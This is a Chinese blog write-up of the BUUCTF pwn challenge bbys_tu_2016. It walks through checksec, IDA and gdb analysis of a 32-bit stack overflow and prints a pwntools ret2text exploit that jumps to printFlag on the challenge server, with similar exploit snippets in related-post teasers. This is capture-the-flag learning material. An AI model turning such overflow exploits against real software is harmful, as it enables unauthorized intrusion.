bbys_tu_2016（write up）

爱若 AI_ruo

已于 2023-01-14 02:59:06 修改

阅读量96

点赞数

分类专栏： pwn刷题文章标签：网络安全

于 2023-01-14 02:32:16 首次发布

本文链接：https://blog.csdn.net/m0_73756460/article/details/128681722

版权

pwn刷题专栏收录该内容

34 篇文章 0 订阅

订阅专栏

bbys_tu_2016（write up）

一题非常基础的ret2text

惯例先checksec一下
在这里插入图片描述

开启了nx防护的32位程序放进ida里看看

main函数里有一个非常明显的栈溢出（一个小坑是ida里的偏移是错的得到gdb上去调试结果是0x14）

在这里插入图片描述

找到了printFlag函数可以直接打印flag
在这里插入图片描述

exp：

from pwn import *
io=remote('node4.buuoj.cn',26969)
payload='a'*(0x14+4)+p32(0x804856D)
io.sendline(payload)
io.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

爱若 AI_ruo

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
bbys_tu_2016（write up）

【buuctf】刷题 bbys_tu_2016（write up）
复制链接

扫一扫

专栏目录

bbys_tu_2016(ret2text)

weixin_45441024的博客

11-29

988

BUUCTF bbys_tu_2016(ret2text) 毫无疑问地check一下运行一下，发现并没有给我们什么有用的信息，这是第一次尝试用gdb-peda来做题，附上gdb-peda的安装方式： $ git clone https://github.com/longld/peda.git ~/peda $ echo "source ~/peda/peda.py" >> ~/.gdbinit 那我们来调试一下吧这里我在main函数的地方(ida里面找到的)下了一个断点，如果你想调

BUUCTF pwn水题大赏（六）

o琦野o的博客

03-11

326

BUUCTF pwn水题大赏suctf_2018_stack suctf_2018_stack 最最最最最最基本的栈溢出，也不知道为啥会这么高分。 exp： from pwn import* context.log_level = 'DEBUG' p=remote('node3.buuoj.cn',28582) #p=process('./SUCTF_2018_stack') elf=ELF('./SUCTF_2018_stack') payload = 'a'*0x28+p64(0x0040067A)

参与评论您还未登录，请先登录后发表或查看评论

bbys_tu_2016

m0sway的博客

12-01

1050

bbys_tu_2016 使用checksec查看：只开启了栈不可执行，看样子是栈溢出的题目。拉进IDA中查看：将用户输入的数据写入v4，但是并没有限制写入的长度，存在栈溢出。查看下字符串，发现后门函数printFlag(): 那就直接溢出跳过来就完事。然而事情并没有这样就结束，打了两次发现flag出不来，就用gdb调试了下：输入的位置为0xffffd714，ebp位置为0xffffd728 实际的距离是0x14并不是IDA中所显示的0xc exp: from pwn import *

[BUUCTF]PWN——bbys_tu_2016

mcmuyanga的博客

11-11

525

bbys_tu_2016 附件步骤：例行检查，32位程序，开启了nx保护本地试运行一下程序，看看大概的情况，测试时候发现输入长度过长程序会崩溃，猜测输入点存在问题 32位ida载入，检索程序里的字符串，发现有直接读出flag的函数可以利用 flag_addr=0x804856D main函数没有限制v4的长度，存在溢出漏洞，覆盖ret为读出flag的地址即可 from pwn import * r=remote('node3.buuoj.cn',29593) flag_addr=0x

[BUUCTF-pwn]——bbys_tu_2016

Y_peak的博客

03-17

326

[BUUCTF-pwn]——bbys_tu_2016 简单的栈溢出，不过竟然是esp寻址，害的孩子找了好久还是要动态调试一般地址会误差八个字节 error exploit from pwn import * #p = remote('node3.buuoj.cn',28360) p = process('./bbys_tu_2016') gdb.attach(p, "b *0x080485ED") flag = 0x0804856D payload = 'a' * (0xc + 4) + p32(fla

BUUCTF刷题1

m0_51251108的博客

05-19

331

BUUCTF刷题wp题目：babyheap_0ctf_2017:pwn2_sctf_2016:[ZJCTF 2019]EasyHeap:hitcontraining_uaf：babyfengshui_33c3_2016：pwnable_orw：picoctf_2018_buffer overflow 2：xdctf2015_pwn200：jarvisoj_level1:ciscn_2019_n_3：bbys_tu_2016：inndy_rop：roarctf_2019_easy_pwn：mrctf2020_

BUUCTF bbys_tu_2016&&xm_2019_awd_pwn2

doudoudedi

01-23

1019

在家希望武汉的师傅们一切都好~~ bbys_tu_2016 这道有点没搞清额额flag文件是flag.txt是能control但是好像不能ROP也是能读到flag文件的就很简单了还有似乎文件没写好setbuf函数不会先出现io流 exp: #!/usr/bin/python2 from pwn import * local=0 if local==1: p=process('../binary/...

buuctf pwn wp（第1.5波）学会用ELF语句进行AAAA（即本地做题目）

月阴荒的博客

03-24

560

这里是一个总的分类，一个类型的第一道题目会详细介绍，后面的类型相同的会简略介绍（不过这是第二波，额还是很简单的，原理可以看我前面的文章，后面难一点的题目我再讲原理。）这一波题都是无脑AAAA的类型，它们的区别主要就是打入多少个填充字符A的区别，（还有接受到什么字符串的区别），反正都是最简单的一类题。另外声明，脚本有些来自于网络上（太简单的不想多看，太难的不会，除了中间那一档的也没哪些脚本是自己...

BUUCTF 周练 Week1

weixin_44229639的博客

11-03

2746

Week 1 Q1 axb_2019_brop64(这题本来是盲打，buuoj给了源文件难度减少了很多) IDA分析发现，read函数长度存在栈溢出 checksec结果，没有Canary和PIE，可直接利用栈溢出构造rop 本题靶机使用的是Ubuntu16 使用libc-2.23.so （或者可使用LibcSearcher 寻找对应libc) 构造rop思路：在此之前 puts函数已被调用，其GOT表被覆盖为真实的函数地址，可利用ROPgadget 得到real_puts_

BUUOJ PWN 41-60

2h4ox1n9

12-11

338

41、jarvisoj_level3_x64 本地没问题，jaroj也没问题，buu上说啥就是不行。。libc搜不到，奇了怪了，jaroj上不用选择版本直接就可以

一文解读，网络安全行业人才需求情况《网络安全产业人才发展报告》

weixin_59086772的博客

10-18

8332

随着近几天国家网络安全宣传周在全国各地开展活动，网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里，惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何？该怎么提升自我能力，更快地加入网安行列。今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。一、网络安全行业市场发展情况网络时代生活越来越离不开网络，与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障，个人和企业等重.

OGSM绩效管理培训材料双份资料.pptx

07-12

OGSM绩效管理培训材料双份资料.pptx

07-12

07-12

【ppt素材】工作总结、商业计划书、述职报告、读书分享、家长会、主题班会、端午节、期末、夏至、中国风、卡通、小清新、岗位竞聘、公司介绍、读书分享、安全教育、文明礼仪、儿童故事、绘本、防溺水、夏季安全、科技风、商务、炫酷、企业培训、自我介绍、产品介绍、师德师风、班主任培训、神话故事、巴黎奥运会、世界献血者日、防范非法集资、3D快闪、毛玻璃、人工智能等等各种样式的ppt素材风格。设计模板、图片素材、PPT模板、视频素材、办公文档、小报模板、表格模板、音效配乐、字体库。广告设计：海报，易拉宝，展板，宣传单，宣传栏，画册，邀请函，优惠券，贺卡，文化墙，标语，制度，名片，舞台背景，广告牌，证书，明信片，菜单，折页，封面，节目单，门头，美陈，拱门，展架等。电商设计：主图，直通车，详情页，PC端首页，移动端首页，钻展，优惠券，促销标签，店招，店铺公告等。图片素材：PNG素材，背景素材，矢量素材，插画，元素，艺术字，UI设计等。视频素材：AE模板，会声会影，PR模板，视频背景，实拍短片，音效配乐。办公文档：工作汇报，毕业答辩，企业介绍，总结计划，教学课件，求职简历等PPT/WORD模板。

搭建zookeeper

07-12

搭建zookeeper

2024年欧洲快速断开配件市场主要企业市场占有率及排名.docx

07-12

2024年欧洲快速断开配件市场主要企业市场占有率及排名.docx

springcloud-基于Spring Boot的微服务开发框架

07-12

Spring Cloud是一套基于Spring Boot的微服务开发框架，它提供了一种构建分布式系统和服务网格的完整解决方案。Spring Cloud的核心目标是利用Spring Boot的自动化配置特性，使开发者能够快速搭建出分布式系统中的各个组件，如服务发现、配置中心、熔断器、智能路由、消息总线、负载均衡、断路器、数据监控等。 Spring Cloud生态系统庞大且功能丰富，其中包含了多个子项目，比如Spring Cloud Netflix（Eureka、Hystrix、Ribbon、Feign等），用于服务发现、断路器、负载均衡和REST客户端；Spring Cloud Config用于集中化配置管理，确保在不同环境下的配置一致性；Spring Cloud Gateway作为API网关，负责路由、过滤和安全控制；Spring Cloud Stream用于构建消息驱动的微服务应用，支持与外部消息中间件的集成；Spring Cloud Sleuth和Zipkin则提供了分布式追踪能力，便于在复杂的服务调用链中定位问题。 Spring Cloud的强大之处在于它将复杂的分布式系统抽

Web开发领域-Node.js技术-HTTP服务器搭建与操作-实验教程及心得

07-12

内容概要：本实验报告详细记录了一次基于Node.js的Web服务器搭建实验过程，旨在帮助学生掌握Node.js的基本操作和理解HTTP协议的工作原理。实验中，学生通过引入Node.js的内置http模块创建了一个简单的HTTP服务器，设置回调函数处理请求与响应，并学习了如何通过改变Content-Type头来影响页面渲染方式。此外，实验还涉及了如何针对不同URL路径返回特定内容，以及如何使用命令行工具启动和管理服务器。适用人群：本资源适合正在学习Web开发基础，特别是Node.js初学者的学生或开发者。对于希望深入了解服务器端编程、HTTP协议及响应类型的人来说尤为有用。使用场景及目标：教学场景：作为大学课程《Web平台B》的实验教材，帮助学生实践Node.js编程和Web服务器搭建技能。自我学习：供个人或小组在课余时间进行自主学习，通过动手实践加深对Node.js和HTTP的理解。项目准备：为即将开始的Web项目提供基础知识和技能储备，尤其是在使用Node.js构建后端服务时。

flag{}的格式是这样的

05-27

k = 13: zzzuzkzyyvhdvdzdvldvdzvddxducydazzayf5dv9BBys;iz;vhvezd=sduzdz=sdu=d9zzzzazcz k = 14: aavvalazzwieewaewmeweaweeylevzedbabzg6ew:<CCzt<j{ifweAtevAewAte>eazaaabad k = 15: ...

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交